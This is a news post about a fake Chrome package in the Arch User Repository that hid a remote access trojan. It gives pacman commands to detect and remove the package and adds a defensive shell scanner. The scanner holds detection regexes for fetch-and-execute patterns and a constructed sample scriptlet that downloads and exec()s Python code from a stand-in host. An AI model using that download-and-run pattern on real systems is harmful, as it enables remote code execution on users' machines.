The Arch User Repository (AUR) is a popular resource for Arch Linux users. It hosts user-submitted build scripts for software not included in the official repositories. While its openness provides flexibility, it also introduces vulnerabilities.
Just a few weeks ago, the AUR was hit by a RAT (remote access trojan) that disguised itself inside browser-related packages. It infected systems during the install process using a malicious GitHub link embedded in the PKGBUILD script.
Now, a similar case has emerged, where a new package pretending to be Google Chrome has been caught carrying another hidden RAT script.
What's Happening: A package named google-chrome-stable made its way into the AUR, uploaded by a newly created user account called "forsenontop", which had no activity other than this upload.
According to Linuxiac, the package used an .install script to run a Python command that downloaded and executed remote code each time the Chrome browser was launched. The code runs silently in the background, with no visible signs to the user.
Luckily, the package was quickly removed by AUR admins once it was reported by a user.
What Now: Like earlier, if you suspect that you might be affected, then you can first run the following command to see whether the malicious package is on your system:
pacman -Qs google-chrome-stable
If this package shows up in your system, then remove it immediately with:
sudo pacman -Rns google-chrome-stable
Updated on August 4, 2025, at 05:10 UTC.
And I will say this again: always make sure your system is up to date and only install packages from trusted sources.
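The technique described above, an .install script that fetches and runs remote code, can be screened for before building. The script below is an added example, not code from the AUR, Linuxiac or the removed package: its regexes, function names and both sample scriptlets are constructed assumptions, and the URL uses the reserved .invalid domain.

```shell
#!/bin/sh
# Added example: heuristic pre-build review of a PKGBUILD or .install scriptlet.
# The regexes below are assumptions, not signatures from the removed package.

# Lines that fetch remote content, and lines that execute dynamic code.
FETCH_RE='(curl|wget)[[:space:]]|urllib|urlopen|requests\.get'
EXEC_RE='python[0-9.]*[[:space:]]+-c|\|[[:space:]]*(ba|z)?sh|exec\(|eval[[:space:]]'

# hits REGEX FILE: matching non-comment lines, prefixed with line numbers.
hits() {
    grep -nE "$1" "$2" | grep -vE '^[0-9]+:[[:space:]]*#' || true
}

# scan_scriptlet FILE: returns 0 and prints evidence when the file both
# fetches and executes; 1 when it does not; 2 when it cannot be read.
scan_scriptlet() {
    [ -r "$1" ] || return 2
    ss_fetch=$(hits "$FETCH_RE" "$1")
    ss_exec=$(hits "$EXEC_RE" "$1")
    [ -n "$ss_fetch" ] && [ -n "$ss_exec" ] || return 1
    printf '%s\n%s\n' "$ss_fetch" "$ss_exec" | sort -t: -k1,1n -u
}

# write_samples DIR: constructed inputs (the URL is a reserved example domain).
write_samples() {
    cat > "$1/bad.install" <<'EOF'
post_install() {
    # constructed sample: launcher that pulls and runs remote Python
    python -c "import urllib.request as u; exec(u.urlopen('https://example.invalid/p').read())" &
}
EOF
    cat > "$1/good.install" <<'EOF'
# See https://example.invalid/docs; do not pipe curl | sh
post_install() {
    update-desktop-database -q
}
EOF
}

# With file arguments, report each one that needs manual review.
for f in "$@"; do
    if scan_scriptlet "$f"; then echo "REVIEW BEFORE BUILDING: $f"; fi
done
```

Saved under a name of your choosing and run with the PKGBUILD and any .install files from a cloned AUR directory as arguments, a hit means the file should be read by hand before building. A clean result only means these particular patterns were absent.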
Via: Linuxiac